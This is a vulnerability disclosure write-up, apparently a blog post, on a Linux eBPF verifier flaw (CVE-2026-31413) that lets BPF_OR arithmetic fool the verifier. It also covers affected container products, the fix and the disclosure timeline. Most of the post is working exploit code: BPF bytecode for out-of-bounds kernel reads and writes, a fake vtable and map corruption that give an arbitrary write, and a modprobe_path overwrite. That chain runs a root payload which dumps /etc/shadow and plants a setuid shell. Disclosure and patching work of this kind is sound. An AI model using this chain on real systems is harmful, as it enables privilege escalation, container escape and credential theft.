Here's the full oob_read_prog - this is the actual code from the exploit, not pseudocode:

static int oob_read_prog(int map_fd, int dst_fd, int offset)
{
    int K = -offset;
    struct bpf_insn insn[] = {
        /* look up map_fd[0] → R0 = pointer to value, load seed into R6 */
        BPF_LD_MAP_FD(R1, map_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
        BPF_ST_MEM(BPF_DW, R10, -8, 0),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),       /* map_lookup_elem */
        BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
        BPF_LDX_MEM(BPF_DW, R6, R0, 0),                  /* R6 = seed (positive) */

        /* look up dst_fd[0] → R9 = pointer to output buffer */
        BPF_LD_MAP_FD(R1, dst_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
        BPF_ST_MEM(BPF_DW, R10, -8, 0),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
        BPF_MOV64_REG(R9, R0),

        /* look up map_fd[0] again → R8 = base pointer for OOB access */
        BPF_LD_MAP_FD(R1, map_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
        BPF_MOV64_REG(R8, R0),

        /* === THE BUG === */
        BPF_ALU64_IMM(BPF_ARSH, R6, 63),                 /* R6 = 0 (positive seed) */
        BPF_ALU64_IMM(BPF_OR, R6, K),                    /* verifier: R6=0, runtime: R6=K */
        BPF_MOV64_IMM(R7, 0),
        BPF_ALU64_REG(BPF_SUB, R7, R6),                   /* R7 = -K = offset */
        BPF_ALU64_REG(BPF_ADD, R8, R7),                   /* R8 = map_value + offset (OOB) */
        BPF_LDX_MEM(BPF_DW, R0, R8, 0),                  /* OOB read: 8 bytes */
        BPF_STX_MEM(BPF_DW, R9, R0, 0),                  /* store to output map */
        BPF_MOV64_IMM(R0, 0),
        BPF_EXIT_INSN(),
    };
    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}

And the OOB write - same ARSH+OR trick, but writes a value from a third map into the OOB offset:

static int oob_write_prog(int map_fd, int val_fd, int offset)
{
    int K = -offset;
    struct bpf_insn insn[] = {
        /* look up map_fd[0], load seed, trigger the bug */
        BPF_LD_MAP_FD(R1, map_fd),
        BPF_ST_MEM(BPF_W, R10, -4, 0),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JEQ, R0, 0, 20), BPF_MOV64_REG(R9, R0),
        BPF_LDX_MEM(BPF_DW, R6, R9, 0),                  /* R6 = seed */

        BPF_ALU64_IMM(BPF_ARSH, R6, 63),                 /* R6 = 0 */
        BPF_ALU64_IMM(BPF_OR, R6, K),                    /* R6 = K (verifier: 0) */
        BPF_JMP_IMM(BPF_JSLT, R6, 0, 13),                /* skip if negative (verifier path) */

        BPF_MOV64_IMM(R7, 0),
        BPF_ALU64_REG(BPF_SUB, R7, R6),                   /* R7 = -K */
        BPF_ALU64_REG(BPF_ADD, R9, R7),                   /* R9 = OOB target */

        /* look up val_fd[0] → R8 = value to write */
        BPF_LD_MAP_FD(R1, val_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JEQ, R0, 0, 4),
        BPF_LDX_MEM(BPF_DW, R8, R0, 0),                  /* R8 = write value */

        BPF_STX_MEM(BPF_DW, R9, R8, 0),                  /* OOB write */
        BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 2),
        BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 0),
        BPF_EXIT_INSN(),
    };
    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}

To trigger either program, I attach it to a socket pair and push a packet through:

static int trigger_bpf_prog(int prog_fd)
{
    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0) return -1;
    setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));
    char buf[64] = "x";
    write(socks[1], buf, sizeof(buf));
    struct timeval tv = { .tv_sec = 1 };
    setsockopt(socks[0], SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
    read(socks[0], buf, sizeof(buf));
    close(socks[0]); close(socks[1]);
    return 0;
}

The negate-and-add pattern (R7 = 0 - R6; R8 += R7) lets us reach negative offsets from the map value - which is where the map's own metadata lives.

Exploitation: OOB to Container Escape

The full chain:

BPF_OR divergence (verifier: dst=0, runtime: dst=K)
    │
    ▼
Arbitrary OOB read/write relative to map value
    │
    ├── Read offset -136 → leak freeze_mutex.wait_list → map kernel address
    ├── Read offset -264 → leak ops vtable → confirm array_map_ops
    │
    ▼
Build fake bpf_map_ops vtable in map value (42 slots from kallsyms)
    → slot 15 (map_push_elem) = array_map_get_next_key
    │
    ▼
Corrupt map header via OOB writes
    → ops → fake vtable
    → map_type → BPF_MAP_TYPE_QUEUE (22)
    → max_entries → 0xFFFFFFFF
    │
    ▼
bpf(BPF_MAP_UPDATE_ELEM) dispatches through map_push_elem
    → array_map_get_next_key(map, value, flags)
    → writes *(u32*)value + 1 to *(u32*)flags
    → flags = attacker-controlled kernel address
    │
    ▼
Overwrite modprobe_path → "/tmpn/mo"
    │
    ▼
Exec unknown binary format → kernel runs /tmpn/mo as root
    │
    ▼
Restore map header → clean exit

The Target Layout

                   struct bpf_map (embedded in bpf_array)
                   ┌────────────────────────────────────────┐
offset from val[0] │                                        │
    -264           │ ops          (struct bpf_map_ops *)    │ ← vtable pointer
    -240           │ map_type     (u32)                     │
    -236           │ key_size     (u32)                     │
    -232           │ value_size   (u32)                     │
    -228           │ max_entries  (u32)                     │
                   │ ...                                    │
    -136           │ freeze_mutex.wait_list                 │ ← points back into struct
                   │ ...                                    │
       0           │ value[0]     ← our OOB origin          │
                   └────────────────────────────────────────┘

I verified these with pahole on the 6.12.76-docker vmlinux. On the tested kernel, the offsets matched exactly.

Step 1: Information Leak

Two OOB reads give me everything I need:

uint64_t wait_list = do_oob_read(victim, scratch, OFF_WAIT_LIST);
uint64_t map_addr = wait_list - 128;
uint64_t val_addr = map_addr + 264;

uint64_t ops = do_oob_read(victim, scratch, OFF_OPS);
if (ops != ARRAY_MAP_OPS) {
    fprintf(stderr, "[-] ops mismatch! Kernel might be patched.\n");
    return 1;
}

At this point I have: the map's kernel address, the address of my controlled data (value[0]), and the confirmed vtable pointer.

Step 2: Fake Vtable

uint64_t *vt = (uint64_t *)(val + 8);  // offset 8 in value (slot 0 is seed)
vt[ 0] = sym_alloc_check;       // map_alloc_check
vt[ 1] = sym_alloc;             // map_alloc
vt[ 2] = 0;                     // map_release (unused path)
vt[ 3] = sym_free;              // map_free
vt[ 4] = sym_get_next_key;      // map_get_next_key
// ...
vt[12] = sym_lookup_elem;       // map_lookup_elem
vt[13] = sym_update_elem;       // map_update_elem
vt[14] = sym_delete_elem;       // map_delete_elem
vt[15] = ARRAY_GET_NEXT_KEY;    // map_push_elem ← THE HIJACK
// ...
vt[40] = sym_mem_usage;         // map_mem_usage

Slot 15 is map_push_elem. In the real array_map_ops this is NULL (arrays don't support push). I replace it with array_map_get_next_key.

Why get_next_key? Its signature is:

int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)

It reads *(u32 *)key, increments it, and writes the result to *(u32 *)next_key. When called through the map_push_elem dispatch path:

int bpf_map_push_elem(struct bpf_map *map, void *value, u64 flags)
    → map->ops->map_push_elem(map, value, flags)

Step 3: Map Corruption

Before I can use the fake vtable, I need to redirect the map to it and change its type so the kernel dispatches through map_push_elem. Three OOB writes, executed in order:

// Point ops at my fake vtable (lives at val_addr + 8)
exec_oob_write(prog_wr_ops, scratch, val_addr + 8);

// Disable max_entries bounds check
exec_oob_write(prog_wr_max, scratch, 0xFFFFFFFFULL);

// Change map_type to BPF_MAP_TYPE_QUEUE (22)
exec_oob_write(prog_wr_type, scratch, 22ULL);

Step 4: Arbitrary Write via map_push_elem

Now I can write 4 bytes to any kernel address:

#define ARB_WRITE32(addr, val32) do { \
    uint32_t _v = (val32); \
    uint32_t _pv = _v - 1; \
    memset(push_buf, 0, sizeof(push_buf)); \
    memcpy(push_buf, &_pv, 4); \
    map_push(victim, push_buf, (addr)); \
} while(0)

The write primitive is a 4-byte u32 store via get_next_key. There are no alignment constraints - the kernel performs a normal *(u32 *)addr = val at whatever address we supply.

Step 5: modprobe_path Overwrite

The target path is /tmpn/mo. I can't write arbitrary strings - I write 4 bytes at a time via get_next_key's integer increment. But I only need two writes:

// Original: "/sbin/modprobe\0"
// Write "/tmp" at offset 0:
ARB_WRITE32(MODPROBE_PATH + 0, 0x706d742fU);  // "/tmp" little-endian
// Write "\0\0\0\0" at offset 8 (null-terminate):
ARB_WRITE32(MODPROBE_PATH + 8, 0x00000000U);
// Bytes 4-7 are untouched: "n/mo" from original "/sbin/modprobe"
// Result: "/tmpn/mo\0"

snprintf(payload_script, sizeof(payload_script), "/proc/1/root/tmpn/mo");

The payload:

#!/bin/sh
id > /tmp/pwned
cat /etc/shadow >> /tmp/pwned 2>/dev/null
cp /bin/sh /tmp/pwn 2>/dev/null && chmod 04755 /tmp/pwn 2>/dev/null

Step 6: Cleanup

exec_oob_write(prog_rst_type, scratch, orig_type_key);
exec_oob_write(prog_rst_max, scratch, orig_max);
exec_oob_write(prog_rst_ops, scratch, orig_ops);

In my demo environment, the full chain from first OOB read to root shell took a couple of seconds.

v2: Data-Only Credential Overwrite

It also auto-detects task_struct layout by probing init_task.pid and init_task.comm against known offset profiles, so no hardcoded offsets at the call site.

Who's Affected

Unprivileged BPF systems

Most modern distros ship with unprivileged_bpf_disabled=1 or =2 (locked), so this path is closed on default installs of Ubuntu 22.04+, Debian 12+, Fedora, RHEL 9, etc.

Kubernetes / Container environments

This is where the bug hurts. Standard unprivileged containers drop CAP_BPF, so they can't trigger the bug. But a lot of infrastructure pods run with elevated caps:

Product	Default Privileges	Notes
Cilium (GKE Dataplane V2)	`CAP_SYS_ADMIN` + `CAP_NET_ADMIN`	Network policy, runs on every node
Falco	`privileged: true`	Runtime security, mounts /dev
Tetragon	`privileged: true`	eBPF observability
Datadog Agent	`CAP_SYS_ADMIN` + 7 more	Metrics, logs, APM
Pixie	`privileged: true`	eBPF-based observability
Tracee	`privileged: true` or BPF caps	Aqua's runtime security

From host root on one node, lateral movement to other nodes is usually possible via the same DaemonSet (shared service accounts, mounted secrets, etc.).

Managed Kubernetes (GKE, EKS, AKS)

Amazon EKS and Azure AKS are also potentially affected if they're running 6.12.x kernels with Cilium or similar BPF-based networking. Need to check specific AMI/VM image versions.

Android

This is speculative and depends on Android's kernel adoption timeline. I filed with Android VRP for tracking.

Shared-kernel containers (LXC/LXD)

What it doesn't escape

Kernels affected

Branch	Affected	Fixed
6.12.y (LTS)	`dea9989a3f` through 6.12.79	6.12.80+
6.18.y	`4c122e8ae149` through 6.18.20	6.18.21+
6.19.y	`e52567173ba8` through 6.19.10	6.19.11+
mainline	7.0-rc1 through 7.0-rc4	7.0-rc5+

Introducing commit: bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier") Fix commit: c845894ebd6f

CAP_BPF is not a safe capability. A verifier bug converts it into arbitrary kernel read/write. Products that grant it to workload pods should treat it as CAP_SYS_ADMIN.

The Fix

One character:

-    branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
+    branch = push_stack(env, env->insn_idx, env->insn_idx, false);

Instead of pushing the branch to insn_idx + 1 (skipping the ALU instruction), push to insn_idx - the instruction itself. The pushed path re-executes the ALU op with dst = 0:

AND: 0 & K = 0 ✓
OR: 0 | K = K ✓

I went through three patch revisions:

v1: Added an opcode parameter to maybe_fork_scalars() and set dst = K for OR, dst = 0 for AND on the pushed path. Worked but added complexity.
v2: Eduard Zingerman suggested the re-execute approach - push to insn_idx instead of insn_idx + 1. Simpler, opcode-independent, eliminates the entire class of skip-vs-execute bugs.
v3: Single-line comment style in selftests, per Alexei Starovoitov's review. Same fix.

Merged as c845894ebd6f on March 22 by Alexei Starovoitov. Selftests in 0ad1734cc559. Reviewed by Eduard Zingerman, acked by Amery Hung.

The selftests cover three cases:

or_scalar_fork_rejects_oob - ARSH 63 + OR 8, value_size=8, access at offset 8 is OOB → must reject
and_scalar_fork_still_works - regression test, AND path still accepts
or_scalar_fork_allows_inbounds - OR 4, value_size=8, offset 4 is in-bounds → must accept

Linus merged d5273fd3ca0b ("Merge tag 'bpf-fixes'") with the note: "Fix unsound scalar fork for OR instructions (Daniel Wade)".

Timeline

Date	Event
2026-01-14	`bffacdb80b93` introduces `maybe_fork_scalars()` in 7.0-rc1
2026-03-04	Bug backported to 6.12.y stable as `dea9989a3f`
2026-03-11	I find the bug during verifier audit
2026-03-12	OOB read/write confirmed, exploit working
2026-03-13	Container escape PoC complete, video recorded
2026-03-14	Patch v3 sent to bpf@vger.kernel.org
2026-03-22	Fix merged by Alexei Starovoitov into bpf/bpf.git
2026-04-06	Linus merges bpf-fixes tag into mainline
2026-04-12	CVE-2026-31413 assigned by Greg Kroah-Hartman

Resources

Fix commit: c845894ebd6f ("bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR")
Selftests: 0ad1734cc559 ("selftests/bpf: Add tests for maybe_fork_scalars() OR vs AND handling")
Introducing commit: bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier")
Patch series: lore.kernel.org
Exploit source + patches: github.com/Rat5ak/bpf-research

CVE-2026-31413 - Fixed in Linux 7.0-rc5. Affected: 6.12.75+ (stable backport) through 7.0-rc4.

*Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium